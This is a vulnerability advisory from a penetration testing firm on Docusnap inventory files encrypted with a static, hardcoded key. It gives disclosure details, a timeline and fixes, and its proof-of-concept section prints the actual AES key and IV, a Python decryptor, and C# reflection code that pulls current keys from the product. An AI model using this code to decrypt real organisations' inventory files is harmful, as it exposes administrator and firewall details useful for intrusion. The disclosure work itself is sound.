Docusnap Inventory Files Encrypted with Static Key

Inventory files created by Docusnap, containing information like installed programs, firewall rules and local administrators, are encrypted with a static key. The decryption key can be obtained easily from the .NET application, downloadable from the vendor’s website. When following Docusnap’s installation instructions for Windows Domains, every domain user has read access to these files.

Details

• Product: Docusnap Client for Windows
• Affected Versions: 13.0.1440.24261 and likely all previous versions and all versions until now
• Vulnerability Type: Information Disclosure
• Security Risk: low
• Vendor URL: https://www.docusnap.com/en
• Vendor Status: notified, insufficient fix supplied
• Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-012
• Advisory Status: published
• CVE: CVE-2025-26849
• CVE URL: https://www.cve.org/CVERecord?id=CVE-2025-26849

Introduction

Docusnap is the market leader with its wizard-based IT inventory for various technologies such as Windows, Linux, HP-UX, VMware and more.

(from vendor’s homepage)

More Details

Docusnap provides a client software for inventorying Windows hosts. The program is intended to be executed automatically on a schedule directly on the clients. Collected information is written to a network share as an encrypted XML document. The central Docusnap server collects the files from the network share, decrypts them and processes them further. For the computers to be able to upload the inventory files, Docusnap recommends giving modify permissions to the AD group “Authenticated Users”. As modify permissions include read permissions, this means every domain user has access to the encrypted inventory files.

Decompiling the .NET server program, which can be downloaded from the vendor’s homepage, reveals that a static AES key is used for decrypting the inventory files in the function Docusnap.ServerAPI.Model.Tools.CryptoWinImport.DecryptScript. This key seems to be the same for every installation of this software. This renders the encryption useless, as attackers can download the program files from the vendors homepage, extract the decryption key and decrypt every Windows inventory file created by Docusnap. These inventory files do not include secrets, but contain other information useful for attackers, like a list of all local administrators, a list of installed programs or the firewall rules in place.

Inventory files of Linux systems are decrypted using different functions. The source code suggests an encryption using OpenSSL with a 4096 bit RSA key of these files in the function Docusnap.ServerAPI.Model.Tools.CryptoLinuxImport.EnumerateEncryptedLines. The private key is again hardcoded in the program. However, it was not verified that this key can be indeed used to decrypt inventory files created by the Docusnap Linux client.

Proof of Concept

The following Python code can be used to decrypt any Windows Docusnap inventory file:

from base64 import b64decode

import click
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad

K = "Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x".encode("utf-8")
IV = "N7IPe~R}w;1vuy5N".encode("utf-8")


@click.command()
@click.argument("file", type=click.File("r"))
def decrypt(file):
    data = file.read()
    raw = b64decode(data)
    cipher = AES.new(K, AES.MODE_CBC, iv=IV)
    res = unpad(cipher.decrypt(raw), AES.block_size)
    print(res.decode("utf-8"))

if __name__ == "__main__":
    decrypt()

The program expects the path to an encrypted Windows Docusnap inventory file as an argument:

$ decrypt_docusnap.py FILE.xml | xq
<?xml version="1.0" encoding="UTF-8"?>
<HostInformation>
  <System>
    <SystemInformation>Windows</SystemInformation>
[...]

Update 04.12.2024

Since Docusnap version 14, the C# assemblies have been obfuscated and the Windows encryption key has been rotated. Using .NET reflections the decryption keys can still be obtained.

Proof of Concept

To get the current decryption keys the following code can be used:

using Docusnap.ServerAPI.Model.Tools;
using System.Reflection;

//Linux
Type cryptoLinuxImportType = typeof(Docusnap.ServerAPI.Model.Tools.CryptoLinuxImport);
var linux_private_key = cryptoLinuxImportType.GetMethod("GetPrivateKey", BindingFlags.NonPublic | BindingFlags.Static).Invoke(cryptoLinuxImportType, new object[]{});
Console.WriteLine("Linux private key:\n" + linux_private_key);

//Windows
var v = new Docusnap.ServerAPI.Model.Tools.CryptoWinImport();
var _oldScriptKey = typeof(Docusnap.ServerAPI.Model.Tools.CryptoWinImport).GetField("_oldScriptKey", BindingFlags.NonPublic | BindingFlags.Static).GetValue(v);
var _newScriptKey = typeof(Docusnap.ServerAPI.Model.Tools.CryptoWinImport).GetField("_newScriptKey", BindingFlags.NonPublic | BindingFlags.Static).GetValue(v);

Console.WriteLine("Old Windows key: " + _oldScriptKey);
Console.WriteLine("New Windows key: " + _newScriptKey);

Workaround

The ACL of the file share should be adjusted to prevent read access to the inventory files created on other computers.

Fix

Attackers should not be able read the clear text inventory files. This can for example be achieved by using an asymmetric encryption method with unique keys for each installation. Another option would be to prevent users from reading the inventory files.

Security Risk

Attackers with read access to Docusnap inventory files are able to decrypt its contents. This discloses information that can be used for further attacks. Due to the requirement for access to the files and the low severity of the information, this vulnerability is rated to pose a low risk only.

Timeline

• 2024-09-12 Vulnerability identified
• 2024-09-17 Customer approved disclosure to vendor
• 2024-10-30 Asked vendor for security contact
• 2024-11-07 Asked vendor for security contact via different mail
• 2024-11-08 Vendor notified
• 2024-11-08 Phone call with vendor for clarification
• 2024-12-04 Vendor released version 14 and considers the vulnerability fixed
• 2024-12-11 Vendor received updated PoC
• 2025-02-16 CVE assigned
• 2025-03-04 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/